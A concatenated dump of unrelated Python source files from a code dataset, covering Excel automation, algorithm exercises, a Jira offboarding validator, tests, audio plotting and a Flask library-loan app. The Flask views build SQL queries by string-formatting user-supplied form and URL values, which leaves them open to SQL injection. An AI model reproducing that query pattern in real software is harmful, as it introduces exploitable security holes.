permanet_add_5\n global PostCode\n global Country_of_Residence\n global Home_No\n global Business_No\n global Mobile_No\n global Email_Add\n global Nanpa_Country_Home\n global Nanpa_Code_Home\n global Nanpa_Country_Bus\n global Nanpa_Code_Bus\n global Nanpa_Country_Mob\n global Nanpa_Code_Mob\n global Tax_Reference_no_1\n global Tax_Reference_no_2\n global Tax_Reference_no_3\n global Tax_Reference_no_4\n global Tax_Reference_no_5\n global Tax_Reference_no_6\n global Tax_Reference_no_7\n global Tax_Reference_no_8\n global Tax_Reference_no_9\n global Tax_Reference_no_10\n \n global tempsplit\n global xl\n global threadflag\n #if os.path.exists(\"AI_CTO.xlsm\"):\n #xl=win32com.client.Dispatch(\"Excel.Application\")\n #xl.Workbooks.Open(os.path.abspath(\"AI_CTO.xlsm\"), ReadOnly=1)\n \n if os.path.exists(\"AI_CTO.xlsm\"):\n print(\"xl object\")\n xl=win32com.client.Dispatch(\"Excel.Application\")\n xl.Workbooks.Open(os.path.abspath(\"AI_CTO.xlsm\"), ReadOnly=0)\n wsref = xl.Worksheets(\"Ref\")\n else:\n print(\"Unable to open the excel\")\n \n ws = xl.Worksheets(\"Ref\")\n wsbo = xl.Worksheets(\"BOData\")\n #ws.Cells(1,1).Value = \"Cell A1\"\n #ws.Cells(1,1).Offset(2,4).Value = \"Cell D2\"\n a,s,c = tempsplit.split(\":\")\n ws.Range(\"B1\").Value = str(\"'\" + a)\n ws.Range(\"B2\").Value = str(\"'\" + s)\n ws.Range(\"B3\").Value = str(\"'\" + c)\n xl.Application.Run(\"AI_CTO.xlsm!ModProcess.dass\")\n \n #xl.Application.Run(\"AI_CTO.xlsm!ModProcess.BOExtract\")\n xl.DisplayAlerts = False \n xl.Application.Save() # if you want to save then uncomment this line and change delete the \", ReadOnly=1\" part from the open function.\n xl.DisplayAlerts = True\n valstatus = \"50%\"\n status_data(\"\")\n \n Customer_ID = wsbo.Range(\"G2\").Value\n Surname = wsbo.Range(\"H2\").Value\n First_Name = wsbo.Range(\"I2\").Value\n Other_Names = wsbo.Range(\"J2\").Value\n Title = wsbo.Range(\"K2\").Value\n suffix = wsbo.Range(\"L2\").Value\n Salutation = wsbo.Range(\"M2\").Value\n Gender = wsbo.Range(\"N2\").Value\n Deceased_Date = wsbo.Range(\"O2\").Value\n Date_of_Birth = wsbo.Range(\"P2\").Value\n Country_of_birth = wsbo.Range(\"Q2\").Value\n Place_of_Birth = wsbo.Range(\"R2\").Value\n Tax_Residence1 = wsbo.Range(\"AA2\").Value\n Tax_Residence2 = wsbo.Range(\"AB2\").Value\n Tax_Residence3 = wsbo.Range(\"AC2\").Value\n Tax_Residence4 = wsbo.Range(\"AD2\").Value\n Tax_Residence5 = wsbo.Range(\"AE2\").Value\n Tax_Residence6 = wsbo.Range(\"AF2\").Value\n Tax_Residence7 = wsbo.Range(\"AG2\").Value\n Tax_Residence8 = wsbo.Range(\"AH2\").Value\n Tax_Residence9 = wsbo.Range(\"AI2\").Value\n Tax_Residence10 = wsbo.Range(\"AJ2\").Value\n Tax_Reference_no_1 = wsbo.Range(\"AK2\").Value\n Tax_Reference_no_2 = wsbo.Range(\"AL2\").Value\n Tax_Reference_no_3 = wsbo.Range(\"AM2\").Value\n Tax_Reference_no_4 = wsbo.Range(\"AN2\").Value\n Tax_Reference_no_5 = wsbo.Range(\"AO2\").Value\n Tax_Reference_no_6 = wsbo.Range(\"AP2\").Value\n Tax_Reference_no_7 = wsbo.Range(\"AQ2\").Value\n Tax_Reference_no_8 = wsbo.Range(\"AR2\").Value\n Tax_Reference_no_9 = wsbo.Range(\"AS2\").Value\n Tax_Reference_no_10 = wsbo.Range(\"AT2\").Value\n permanet_add_1 = wsbo.Range(\"AV2\").Value\n permanet_add_2 = wsbo.Range(\"AW2\").Value\n permanet_add_3 = wsbo.Range(\"AX2\").Value\n permanet_add_4 = wsbo.Range(\"AY2\").Value\n permanet_add_5 = wsbo.Range(\"AZ2\").Value\n PostCode = wsbo.Range(\"BA2\").Value\n Country_of_Residence = wsbo.Range(\"BB2\").Value\n Home_No = wsbo.Range(\"BC2\").Value\n Business_No = wsbo.Range(\"BD2\").Value\n Mobile_No = wsbo.Range(\"BE2\").Value\n Email_Add = wsbo.Range(\"BF2\").Value\n Nanpa_Country_Home = wsbo.Range(\"BJ2\").Value\n Nanpa_Code_Home = wsbo.Range(\"BK2\").Value\n Nanpa_Country_Bus = wsbo.Range(\"BL2\").Value\n Nanpa_Code_Bus = wsbo.Range(\"BM2\").Value\n Nanpa_Country_Mob = wsbo.Range(\"BN2\").Value\n Nanpa_Code_Mob = wsbo.Range(\"BO2\").Value\n Tax_Reference_no_1 = wsbo.Range(\"BP2\").Value\n Tax_Reference_no_2 = wsbo.Range(\"BQ2\").Value\n Tax_Reference_no_3 = wsbo.Range(\"BR2\").Value\n Tax_Reference_no_4 = wsbo.Range(\"BS2\").Value\n Tax_Reference_no_5 = wsbo.Range(\"BT2\").Value\n Tax_Reference_no_6 = wsbo.Range(\"BU2\").Value\n Tax_Reference_no_7 = wsbo.Range(\"BV2\").Value\n Tax_Reference_no_8 = wsbo.Range(\"BW2\").Value\n Tax_Reference_no_9 = wsbo.Range(\"BX2\").Value\n Tax_Reference_no_10 = wsbo.Range(\"BY2\").Value\n\n\n print(\"Customer_ID : \" + str(Customer_ID))\n xl.Application.Quit() # Comment this out if your excel script closes\n #if threadflag == 0:\n \n # threadflag = 1\n # threading.Thread(target=mainprocess).start()\n \n mainprocess()\n print(\"main process completed\")\n ctypes.windll.user32.MessageBoxW(0, \"Process has been completed. please click Show Result button.\", \"Agile Automation\", 0)\n #del xl\n\n \ndef clarevar():\n global Customer_ID\n global Surname\n global First_Name\n global Other_Names\n global Title\n global suffix\n global Salutation\n global Gender\n global Deceased_Date\n global Date_of_Birth\n global Country_of_birth\n global Place_of_Birth\n global Tax_Residence1\n global Tax_Residence2\n global Tax_Residence3\n global Tax_Residence4\n global Tax_Residence5\n global Tax_Residence6\n global Tax_Residence7\n global Tax_Residence8\n global Tax_Residence9\n global Tax_Residence10\n global Tax_Reference_no_1\n global Tax_Reference_no_2\n global Tax_Reference_no_3\n global Tax_Reference_no_4\n global Tax_Reference_no_5\n global Tax_Reference_no_6\n global Tax_Reference_no_7\n global Tax_Reference_no_8\n global Tax_Reference_no_9\n global Tax_Reference_no_10\n global permanet_add_1\n global permanet_add_2\n global permanet_add_3\n global permanet_add_4\n global permanet_add_5\n global PostCode\n global Country_of_Residence\n global Home_No\n global Business_No\n global Mobile_No\n global Email_Add\n global Nanpa_Country_Home\n global Nanpa_Code_Home\n global Nanpa_Country_Bus\n global Nanpa_Code_Bus\n global Nanpa_Country_Mob\n global Nanpa_Code_Mob\n global Tax_Reference_no_1\n global Tax_Reference_no_2\n global Tax_Reference_no_3\n global Tax_Reference_no_4\n global Tax_Reference_no_5\n global Tax_Reference_no_6\n global Tax_Reference_no_7\n global Tax_Reference_no_8\n global Tax_Reference_no_9\n global Tax_Reference_no_10\n\n Customer_ID = \"\"\n Surname = \"\"\n First_Name = \"\"\n Other_Names = \"\"\n Title = \"\"\n suffix = \"\"\n Salutation = \"\"\n Gender = \"\"\n Deceased_Date = \"\"\n Date_of_Birth = \"\"\n Country_of_birth = \"\"\n Place_of_Birth = \"\"\n Tax_Residence1 = \"\"\n Tax_Residence2 = \"\"\n Tax_Residence3 = \"\"\n Tax_Residence4 = \"\"\n Tax_Residence5 = \"\"\n Tax_Residence6 = \"\"\n Tax_Residence7 = \"\"\n Tax_Residence8 = \"\"\n Tax_Residence9 = \"\"\n Tax_Residence10 = \"\"\n Tax_Reference_no_1 = \"\"\n Tax_Reference_no_2 = \"\"\n Tax_Reference_no_3 = \"\"\n Tax_Reference_no_4 = \"\"\n Tax_Reference_no_5 = \"\"\n Tax_Reference_no_6 = \"\"\n Tax_Reference_no_7 = \"\"\n Tax_Reference_no_8 = \"\"\n Tax_Reference_no_9 = \"\"\n Tax_Reference_no_10 = \"\"\n permanet_add_1 = \"\"\n permanet_add_2 = \"\"\n permanet_add_3 = \"\"\n permanet_add_4 = \"\"\n permanet_add_5 = \"\"\n PostCode = \"\"\n Country_of_Residence = \"\"\n Home_No = \"\"\n Business_No = \"\"\n Mobile_No = \"\"\n Email_Add = \"\"\n Nanpa_Country_Home = \"\"\n Nanpa_Code_Home = \"\"\n Nanpa_Country_Bus = \"\"\n Nanpa_Code_Bus = \"\"\n Nanpa_Country_Mob = \"\"\n Nanpa_Code_Mob = \"\"\n Tax_Reference_no_1 = \"\"\n Tax_Reference_no_2 = \"\"\n Tax_Reference_no_3 = \"\"\n Tax_Reference_no_4 = \"\"\n Tax_Reference_no_5 = \"\"\n Tax_Reference_no_6 = \"\"\n Tax_Reference_no_7 = \"\"\n Tax_Reference_no_8 = \"\"\n Tax_Reference_no_9 = \"\"\n Tax_Reference_no_10 = \"\"\n\n\n\nif __name__ == '__main__':\n socketio.run(app)\n","repo_name":"sphnixdass/OpenCV","sub_path":"CTO3.py","file_name":"CTO3.py","file_ext":"py","file_size_in_byte":22961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3065761812","text":"N=int(input())\ninputlist=[]\nfor _ in range(N):\n\tinputlist.append(input().split())\n\t\nfor In in inputlist:\n\tposlist=[]\n\thousecount=int(In[0])\n\tfor i in range(1,housecount+1):\n\t\tposlist.append(int(In[i]))\n\tposlist.sort()\n\tzitohouse=poslist[housecount//2]\n\tSum=0\n\tfor j in poslist:\n\t\tSum+=(abs(j-zitohouse))\n\tprint(Sum)\n\t\n\n","repo_name":"SoleMin/Algorithmic_Problems","sub_path":"110401/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40880210847","text":"input_doc= \"jesslookedliketimherbrother\"\ndict_of_words=[\"looked\",\"like\",\"her\",\"kite\",\"time\",\"brother\"]\n\n\ndef naive_impl():\n new_input_doc = \"\"\n input_len = len(input_doc)\n i = 1\n k=0\n while i <= input_len:\n for j in range(k,i):\n str = input_doc[j:i]\n if str in dict_of_words:\n temp_word = input_doc[k:j]\n if len(temp_word)>0:\n new_word = temp_word+\" \"+str+\" \"\n else:\n new_word = str+\" \"\n new_input_doc += \"\".join(new_word)\n k = i\n break\n i += 1\n print(new_input_doc)\n\nnaive_impl()\n","repo_name":"akash29/Practice_problems","sub_path":"CCI/17.13_respace.py","file_name":"17.13_respace.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13828414211","text":"def _pystring_format_effects(key=None):\n\n _pystring_format_effects_dict = {\n \"PURPLE\": \"\\033[95m\",\n \"CYAN\": \"\\033[96m\",\n \"DARKCYAN\": \"\\033[36m\",\n \"BLUE\": \"\\033[94m\",\n \"GREEN\": \"\\033[92m\",\n \"YELLOW\": \"\\033[93m\",\n \"RED\": \"\\033[91m\",\n \"BOLD\": \"\\033[1m\",\n \"UNDERLINE\": \"\\033[4m\",\n \"END\": \"\\033[0m\",\n }\n\n if key != None and key in _pystring_format_effects_dict.keys():\n effect = _pystring_format_effects_dict[key]\n return effect\n else:\n print(\n \"\\033[91m\\033[1m{}\\033[0m is not a valid effect.\\n\\nPlease choose from:\\n\\n{}\".format(\n key, [_key for _key in _pystring_format_effects_dict.keys()]\n )\n )\n\n\ndef _format_string_printing_font(string, formatting_effect=None):\n\n \"\"\"\n Function formats and returns a string using ANSI color codes.\n\n Parameters:\n -----------\n string (required)\n\n formatting_effect (optional)\n default: None\n type: list\n\n Returns:\n --------\n formatted_string\n applies desired formatting to the printed string\n \"\"\"\n\n if type(formatting_effect) != list:\n formatting_effect = [formatting_effect]\n\n formatting_effects = \"\".join(\n [_pystring_format_effects(formatting) for formatting in formatting_effect]\n )\n formatted_string = formatting_effects + string + _pystring_format_effects(\"END\")\n\n return formatted_string\n","repo_name":"mvinyard/vintools","sub_path":"vintools/_utilities/_ux_utils/_pystrings.py","file_name":"_pystrings.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"11251308213","text":"''' Validation of jira request '''\nimport requests\nimport json\nfrom validation.urlcomp import Compose\nfrom plugins import jira, gitlab\nfrom clients.jira import Client as jira_client\nfrom config import config as APPCONFIG\n\njira_client = jira_client()\n\nCompose = Compose()\nAPPCONFIG = APPCONFIG()\n\nclass Validate:\n def __init__(self, env):\n if env not in APPCONFIG['jira']['jqlurl']:\n print('invalid environment')\n sys.exit()\n self._env = env\n self.jira = jira.Jira(env)\n self._base_url = APPCONFIG['jira']['base_url']\n self._headers = {\"content-type\": \"application/json\"}\n self._user = APPCONFIG['jira']['basic_auth']['username']\n self._pass = APPCONFIG['jira']['basic_auth']['password']\n self._auth = (self._user, self._pass)\n \n def _get_request(self):\n \"\"\" request creation \"\"\"\n url = Compose.compose_url(method=\"check_issue\", env=self._env)\n req = requests.get(url, auth=self._auth, headers=self._headers)\n return self._handle_response(req)\n\n def _handle_response(self, response):\n \"\"\" handling response return \"\"\"\n print(response)\n return self._check_issues(response.json())\n\n def _check_issues(self, response):\n \"\"\" check if there are any open issues\"\"\"\n if response['total'] == 0:\n print('no new issues for env', self._env)\n return self._count_issues(response)\n \n def _count_issues(self, response):\n \"\"\" check the amount of open issues \"\"\"\n if response['total'] == 1:\n return self._final_validation(\n response['issues'][0]['fields']['description'],\n response['issues'][0]['key'])\n return self._multiple_issues(response)\n \n def _multiple_issues(self, response):\n issue_number = 0\n while issue_number < response['total']:\n self._final_validation(\n response['issues'][issue_number]['fields']['description'],\n response['issues'][issue_number]['key'])\n issue_number += 1\n return issue_number\n\n def _final_validation(self, issue_body, issue_key):\n \"\"\" creation of users to block list \"\"\"\n to_disable = []\n issue = issue_body.split()\n for item in issue:\n mail_position = item.find('@')\n if mail_position != -1:\n current_user = item[:mail_position]\n to_disable.append(current_user)\n if self._env == \"jira\":\n self.jira.disable_access(user=current_user)\n else:\n gitlab.Gitlab().check_instances(current_user)\n return jira_client.update_issue(issue_key, self._env)\n\n def now(self):\n return self._get_request()","repo_name":"Jeffvos/offboard-automation-python","sub_path":"validation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26006208236","text":"import cv2\n\n# 定義劃框框的function\ndef draw_rect(event,x,y,flag,param):\n global pt1,pt2,firstPoint,secondPoint\n \n if event == cv2.EVENT_LBUTTONDOWN:\n if firstPoint and secondPoint:\n pt1 = (0,0)\n pt2 = (0,0)\n firstPoint = False\n secondPoint= False\n \n if firstPoint == False:\n pt1 = (x,y)\n firstPoint = True\n elif secondPoint == False:\n pt2 = (x,y)\n secondPoint = True\n\n# 定義一個變數叫做Cap並使用cv2.VideoCapture()來抓取對應的視訊機\ncap = cv2.VideoCapture(0)\n\n# 定義一些global variable\npt1 = (0,0)\npt2 = (0,0)\nfirstPoint = False\nsecondPoint= False\n\n# 定義視窗名稱\ncv2.namedWindow(\"Test\")\n# 透過setMouseCallBack, cv2就能知道我們在點哪個視窗應該要觸發什麼樣的事件\ncv2.setMouseCallback(\"Test\", draw_rect)\n\n# 透過While迴圈不斷地抓取抓取照片, 因影片其實就是不間斷的照片\nwhile True:\n # 抓取照片\n ret,frame = cap.read()\n\n if firstPoint:\n cv2.circle(frame, pt1,5,(255,0,0),3)\n \n if firstPoint and secondPoint:\n cv2.circle(frame, pt2,5,(255,0,0),3)\n cv2.rectangle(frame,pt1,pt2,(0,0,255),3) \n\n cv2.imshow(\"Test\",frame) \n \n # 透過按q來結束迴圈\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n# 將VideoCapture 結束\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"WillyLIFEexp/Learning_OPENCV","sub_path":"Part_4/Drawing_on_Video.py","file_name":"Drawing_on_Video.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"35575466436","text":"from flask import render_template, request, redirect, url_for\n\nfrom app import app\nfrom app.forms import ReservaForm, EmprestarForm\nfrom app.conn import get_connection, get_cursor\n\n# ============================\n# home\n# ============================\n\n\n@app.route('/')\n@app.route('/home')\ndef home():\n conn = get_connection()\n cur = get_cursor(conn)\n\n cur.execute(\"\"\"SELECT * FROM reserva WHERE id_usuario = 1\"\"\")\n reservas = cur.fetchall()\n\n cur.execute(\"\"\"SELECT * FROM emprestimo WHERE id_usuario = 1\"\"\")\n emprestimos = cur.fetchall()\n\n cur.close()\n conn.close()\n\n return render_template('home.html', reservas=reservas, emprestimos=emprestimos)\n\n# ============================\n# Reserva\n# =============================\n\n\n@app.route('/reservar_livro', methods=['POST', 'GET'])\ndef reservar_livro():\n\n conn = get_connection()\n cur = get_cursor(conn)\n\n form = ReservaForm()\n\n if request.method == 'POST':\n conn = get_connection()\n cur = get_cursor(conn)\n\n Id_usuario = request.form['Id_usuario']\n Id_livro = request.form['Id_livro']\n\n cur.execute(\"\"\"INSERT INTO reserva (id_usuario, id_livro) VALUES ('%s', '%s')\"\"\" % (Id_usuario, Id_livro))\n\n cur.execute(\"\"\"UPDATE livro SET status = 'reservado' WHERE id_livro = '%s'\"\"\" % Id_livro)\n\n conn.commit()\n\n return redirect(url_for('home'))\n\n cur.close()\n conn.close()\n\n cur.execute(\"\"\"SELECT * FROM usuario\"\"\")\n usuarios = cur.fetchall()\n\n cur.execute(\"\"\"SELECT * FROM livro WHERE status = 'emprestado' or status = 'disponivel'\"\"\")\n livros = cur.fetchall()\n\n cur.close()\n conn.close()\n\n return render_template('add_reserva.html', form=form, livros=livros, usuarios=usuarios)\n\n\n@app.route('/cancelar_reserva/', methods=['GET'])\ndef cancelar_reserva(id_reserva):\n\n conn = get_connection()\n cur = get_cursor(conn)\n\n cur.execute(\"\"\"SELECT id_livro FROM reserva WHERE id_reserva = '%s'\"\"\" % id_reserva)\n id_livro = cur.fetchone()\n\n cur.execute(\"\"\"UPDATE livro SET status = 'disponivel' WHERE id_livro = '%s'\"\"\" % id_livro[0])\n\n cur.execute(\"\"\"DELETE FROM reserva WHERE Id_reserva = '%s'\"\"\" % id_reserva)\n\n conn.commit()\n\n cur.close()\n conn.close()\n\n return redirect(url_for('home'))\n\n\n# ===============================\n# Livros\n# ===============================\n\n\n@app.route('/livros')\ndef livros():\n conn = get_connection()\n cur = get_cursor(conn)\n\n cur.execute(\"\"\"SELECT * FROM livro \"\"\")\n livros = cur.fetchall()\n\n cur.close()\n conn.close()\n\n return render_template('livros.html', livros=livros)\n\n\n# ==============================\n# Emprestar\n# ==============================\n\n\n@app.route('/emprestar_livro', methods=['POST', 'GET'])\ndef emprestar_livro():\n conn = get_connection()\n cur = get_cursor(conn)\n\n form = EmprestarForm()\n\n if request.method == 'POST':\n conn = get_connection()\n cur = get_cursor(conn)\n\n Id_usuario = request.form['Id_usuario']\n Id_livro = request.form['Id_livro']\n Data_emprestimo = request.form['Data_emprestimo']\n\n cur.execute(\"\"\"INSERT INTO emprestimo (id_usuario, id_livro, data_emprestimo) VALUES ('%s', '%s', '%s')\"\"\" % (Id_usuario, Id_livro, Data_emprestimo))\n\n cur.execute(\"\"\"UPDATE livro SET status = 'emprestado' WHERE id_livro = '%s'\"\"\" % Id_livro)\n\n conn.commit()\n\n return redirect(url_for('home'))\n\n cur.close()\n conn.close()\n\n cur.execute(\"\"\"SELECT * FROM usuario\"\"\")\n usuarios = cur.fetchall()\n\n cur.execute(\"\"\"SELECT * FROM livro WHERE status = 'reservado' or status = 'disponivel'\"\"\")\n livros = cur.fetchall()\n\n cur.close()\n conn.close()\n\n return render_template('emprestimo.html', form=form, livros=livros, usuarios=usuarios)\n\n\n@app.route('/devolver_livro/', methods=['GET'])\ndef devolver_livro(id_emprestimo):\n\n conn = get_connection()\n cur = get_cursor(conn)\n\n cur.execute(\"\"\"SELECT id_livro FROM emprestimo WHERE id_emprestimo = '%s'\"\"\" % id_emprestimo)\n id_livro = cur.fetchone()\n\n cur.execute(\"\"\"UPDATE livro SET status = 'disponivel' WHERE id_livro = '%s'\"\"\" % id_livro[0])\n\n cur.execute(\"\"\"DELETE FROM emprestimo WHERE Id_emprestimo = '%s'\"\"\" % id_emprestimo)\n\n conn.commit()\n\n cur.close()\n conn.close()\n\n return redirect(url_for('home'))\n\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run()\n","repo_name":"fernandasj/library-sparks-flask","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4447,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"2832183872","text":"from gym_stag_hunt.envs.gym.escalation import EscalationEnv\nfrom gym_stag_hunt.envs.pettingzoo.shared import PettingZooEnv\nfrom pettingzoo.utils import parallel_to_aec\n\n\ndef env(**kwargs):\n return ZooEscalationEnvironment(**kwargs)\n\n\ndef raw_env(**kwargs):\n return parallel_to_aec(env(**kwargs))\n\n\nclass ZooEscalationEnvironment(PettingZooEnv):\n metadata = {\"render_modes\": [\"human\", \"array\"], \"name\": \"escalation_pz\"}\n\n def __init__(\n self,\n grid_size=(5, 5),\n screen_size=(600, 600),\n obs_type=\"image\",\n enable_multiagent=False,\n opponent_policy=\"pursuit\",\n load_renderer=False,\n streak_break_punishment_factor=0.5,\n ):\n escalation_env = EscalationEnv(\n grid_size,\n screen_size,\n obs_type,\n enable_multiagent,\n opponent_policy,\n load_renderer,\n streak_break_punishment_factor,\n )\n super().__init__(og_env=escalation_env)\n","repo_name":"NullDefault/Gym-Stag-Hunt","sub_path":"gym_stag_hunt/envs/pettingzoo/escalation.py","file_name":"escalation.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"47"} +{"seq_id":"86591676346","text":"import random\nimport unittest\nfrom datetime import datetime\nfrom unittest.mock import MagicMock\n\nfrom src.dto.game_state import GameState\nfrom src.model.card import Card, CardSuit, CardValue\nfrom src.model.deck import Deck\nfrom src.model.game import Game\nfrom src.model.hand import Hand\nfrom src.model.stack import Stack\nfrom src.model.game_player import GamePlayer\nfrom src.repository.game_state_repository import GameStateRepository\nfrom src.repository.game_player_repository import GamePlayerRepository\n\n\n# from src.repository.player_repository import PlayerRepository\nfrom src.service.game_service import GameService\n\n# from src.model.stack import WonStack\n\n\ndef compare(self, other):\n\n if not type(self) == type(other):\n return False\n\n if self.game != other.game:\n return False\n\n if self.player_stacks != other.player_stacks:\n return False\n\n if self.player_hands != other.player_hands:\n return False\n\n return True\n\n\nclass Matcher:\n def __init__(self, compare_func, obj):\n self.compare_func = compare_func\n self.obj = obj\n\n def __eq__(self, other):\n return self.compare_func(self.obj, other)\n\n\nclass TestGameService(unittest.TestCase):\n def setUp(self):\n pass\n\n def test_join(self):\n number_of_players = 2\n game_player_id = \"1\"\n player_id = \"2\"\n game_id = \"123\"\n mock_game_player_repository = MagicMock(spec=GamePlayerRepository)\n game_service = GameService(game_player_repository=mock_game_player_repository)\n game_service.id_generator = MagicMock(return_value=game_player_id)\n\n game_service.join(player_id, game_id)\n\n expected_game_player = GamePlayer()\n expected_game_player.id = game_player_id\n expected_game_player.game_id = game_id\n expected_game_player.player_id = player_id\n\n mock_game_player_repository.create.assert_called_with(\n expected_game_player, number_of_players\n )\n\n def test_bootstrap(self):\n # creating mocks\n mock_game_state_repository = MagicMock(spec=GameStateRepository)\n mock_datetime = MagicMock(spec=datetime)\n mock_datetime.utcnow.return_value = datetime(2020, 1, 1, 1, 1, 1)\n mock_random = MagicMock(spec=random)\n mock_random.randrange.return_value = 0\n game_id = \"123\"\n\n # injecting mocks\n game_service = GameService(game_state_repository=mock_game_state_repository)\n game_service.id_generator = MagicMock(return_value=\"123\")\n game_service.datetime = mock_datetime\n game_service.random = mock_random\n\n # test\n game_service.bootstrap(game_id, Deck())\n\n expected_game_state = self.__get_game_state(game_id)\n # TODO: find proper names for Matcher&Co.\n match_foo = Matcher(compare, expected_game_state)\n mock_game_state_repository.save.assert_called_with(match_foo)\n\n def __get_game_state(self, game_id: str) -> GameState:\n now = datetime(2020, 1, 1, 1, 1, 1)\n\n # creating hands and deck\n hand1 = Hand()\n hand1.id = \"123\"\n hand1.game_id = game_id\n hand1.updated_at = now\n hand1.cards = [\n Card(CardValue.KING, CardSuit.CLUB),\n Card(CardValue.THREE, CardSuit.CLUB),\n Card(CardValue.ACE, CardSuit.CLUB),\n ]\n hand1.turn = 0\n\n hand2 = Hand()\n hand2.id = \"123\"\n hand2.game_id = game_id\n hand2.updated_at = now\n hand2.cards = [\n Card(CardValue.SEVEN, CardSuit.CLUB),\n Card(CardValue.JACK, CardSuit.CLUB),\n Card(CardValue.QUEEN, CardSuit.CLUB),\n ]\n hand2.turn = 1\n\n hands = [\n hand1,\n hand2,\n ]\n\n deck = Deck()\n deck.pick(6)\n\n game = Game()\n game.id = game_id\n game.cards = deck\n\n stack1 = Stack()\n stack1.id = \"123\"\n stack1.game_id = game_id\n\n stack2 = Stack()\n stack2.id = \"123\"\n stack2.game_id = game_id\n\n stacks = [stack1, stack2]\n\n game_state = GameState()\n\n game_state.game = game\n game_state.player_hands = hands\n game_state.player_stacks = stacks\n\n return game_state\n\n\n# def test_game_service_create():\n\n# # creating expected values\n# now = datetime(2020, 1, 1, 1, 1, 1)\n# random_id = \"abcdefgh\"\n# expected_game = Game()\n# expected_game.id = random_id\n# expected_game.created_at = now\n\n# # creating expected hands\n# hand1 = Hand()\n# hand1.id = \"123\"\n# hand1.created_at = now\n# hand1.player_id = \"1\"\n# hand1.cards = [\n# Card(CardValue.ACE, CardSuit.HEART),\n# Card(CardValue.DEUCE, CardSuit.HEART),\n# Card(CardValue.THREE, CardSuit.HEART),\n# ]\n# hand1.turn = 0\n\n# hand2 = Hand()\n# hand2.id = \"456\"\n# hand2.created_at = now\n# hand2.player_id = \"2\"\n# hand2.cards = [\n# Card(CardValue.FOUR, CardSuit.HEART),\n# Card(CardValue.FIVE, CardSuit.HEART),\n# Card(CardValue.SIX, CardSuit.HEART),\n# ]\n# hand2.turn = 1\n\n# expected_hands = [\n# hand1,\n# hand2,\n# ]\n\n# expected_deck = Deck()\n\n# # creating expected won stacks\n# won_stack1 = WonStack()\n# won_stack1.id = \"123\"\n# won_stack1.player_id = \"1\"\n# won_stack1.cards = []\n\n# won_stack2 = WonStack()\n# won_stack2.id = \"456\"\n# won_stack2.player_id = \"2\"\n# won_stack2.cards = []\n\n# expected_won_stacks = [\n# won_stack1,\n# won_stack2,\n# ]\n\n# # mocking repository\n# mock_game_repository = MagicMock(spec=GameRepository)\n# mock_game_repository.save.return_value = expected_player\n\n# # mocking datetime\n# mock_datetime = MagicMock(spec=datetime)\n# mock_datetime.now.return_value = now\n\n# # mocking id generator\n# mock_id_generator = MagicMock(return_value=random_id)\n\n# # injecting mocks into service\n# player_service = PlayerService(mock_player_repository)\n# player_service.datetime = mock_datetime\n# player_service.id_generator = mock_id_generator\n\n# # calling service\n# new_player = Player(id=None, name=\"johnny\")\n# player = player_service.create(new_player)\n\n# assert player.id == random_id\n# assert player.name == \"johnny\"\n# assert player.created_at == now\n# assert player.last_seen == now\n# mock_player_repository.save.assert_called_with(new_player)\n","repo_name":"Mistra/briscola","sub_path":"test/service/test_game_service.py","file_name":"test_game_service.py","file_ext":"py","file_size_in_byte":6475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8515311756","text":"# import soundfile as sf\r\n\r\n# y, sr = sf.read('audio.wav', dtype='int16')\r\n# print(sr)\r\n\r\nimport wave\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n# Open wav file and read frames as bytes\r\nsf_filewave = wave.open('sagar.wav', 'r')\r\nsignal_sf = sf_filewave.readframes(-1)\r\n# Convert audio bytes to integers\r\nsoundwave_sf = np.frombuffer(signal_sf, dtype='int16')\r\n# Get the sound wave frame rate\r\nframerate_sf = sf_filewave.getframerate()\r\n# Find the sound wave timestamps\r\ntime_sf = np.linspace(start=0,\r\n stop=len(soundwave_sf)/framerate_sf,\r\n num=len(soundwave_sf))\r\n# Set up plot\r\nf, ax = plt.subplots(figsize=(15, 3))\r\n# Setup the title and axis titles\r\nitem=max(soundwave_sf)\r\n# for idx, val in np.ndenumerate(soundwave_sf):\r\n# if val == item:\r\n# print(idx)\r\nprint(time_sf[list(soundwave_sf).index(item)])\r\nplt.title('Amplitude over Time')\r\nplt.ylabel('Amplitude')\r\nplt.xlabel('Time (seconds)')\r\n# Add the audio data to the plot\r\nplt.plot(time_sf, soundwave_sf, label='Warm Memories', alpha=0.5)\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n# import librosa\r\n# import matplotlib.pyplot.plot as plt\r\n# audio = 'audio.wav'\r\n# x, sr = librosa.load(audio)\r\n# X = librosa.stft(x)\r\n# Xdb = librosa.amplitude_to_db(abs(X))\r\n# plt.figure(figsize = (10, 5))\r\n# librosa.display.specshow(Xdb, sr = sr, x_axis = 'time', y_axis = 'hz')\r\n# plt.colorbar()","repo_name":"sagar-9850/syllabification","sub_path":"final_version/programs/wav.py","file_name":"wav.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71498331662","text":"import numpy as np\n\n\ndef create_X_Y(ts, f_size=10, offset=0, output_width=1, sum_=False):\n \n \"\"\"\n From a given time series, creates an input array containing the input windows and a label array containing \n the output windows for 